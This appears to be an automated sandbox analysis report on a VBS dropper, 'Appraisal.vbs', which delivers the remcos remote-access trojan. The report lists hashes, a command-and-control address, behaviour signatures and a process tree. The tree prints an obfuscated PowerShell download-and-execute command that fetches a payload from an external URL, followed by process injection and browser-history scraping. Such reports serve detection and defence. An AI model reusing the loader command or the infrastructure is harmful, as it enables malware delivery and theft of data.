Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-04-2021 10:03
Static task
static1
Behavioral task
behavioral1
Sample
Appraisal.vbs
Resource
win7v20210410
General
-
Target
Appraisal.vbs
-
Size
706B
-
MD5
b201aa5242dd9b32ec9c38e1f999c723
-
SHA1
61ab2c43d19c6441e394561e0441890168b9a9ab
-
SHA256
d2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55
-
SHA512
a21aeb8a0ec963875d75ba4920f3bde9a134717a910b94a2743ab7051dabe9e17a5e0a15aeb51be26373f0cb6313b6c964bef2ebb318061074399296d5c5ddfc
Malware Config
Extracted
https://ia601406.us.archive.org/10/items/all_20210426/ALL.TXT
Extracted
remcos
185.19.85.168:1723
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 8 3872 powershell.exe 20 3872 powershell.exe 22 3872 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2232 set thread context of 808 2232 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3872 powershell.exe 3872 powershell.exe 3872 powershell.exe 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3872 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 808 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WScript.exepowershell.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 808 wrote to memory of 3872 808 WScript.exe powershell.exe PID 808 wrote to memory of 3872 808 WScript.exe powershell.exe PID 3872 wrote to memory of 2232 3872 powershell.exe powershell.exe PID 3872 wrote to memory of 2232 3872 powershell.exe powershell.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 808 2232 powershell.exe aspnet_compiler.exe PID 808 wrote to memory of 3112 808 aspnet_compiler.exe aspnet_compiler.exe PID 808 wrote to memory of 3112 808 aspnet_compiler.exe aspnet_compiler.exe PID 808 wrote to memory of 3112 808 aspnet_compiler.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://ia601406.us.archive.org/10/items/all_20210426/ALL.TXT'))))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /sort "Visit Time" /stext "C:\Users\Admin\AppData\Local\Temp\xiec"5⤵PID:3112
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
3dd793f6fdb49034bfaed9d1975a32e5
SHA113bbbb0b874f1c097eb80382a3266cefec632a2e
SHA256de9a6d430a80d2b466e959d4e7e8e3fa6c7384670bdab6fc2881df2ed4b12a37
SHA512f4ca7f706f259d2a5b3e925c25da97093783946c85ef5dce76cd9f28f79539de44ad784c457ada7aed77e3998011831b8101e03576be20252539fe7f27e3e0c7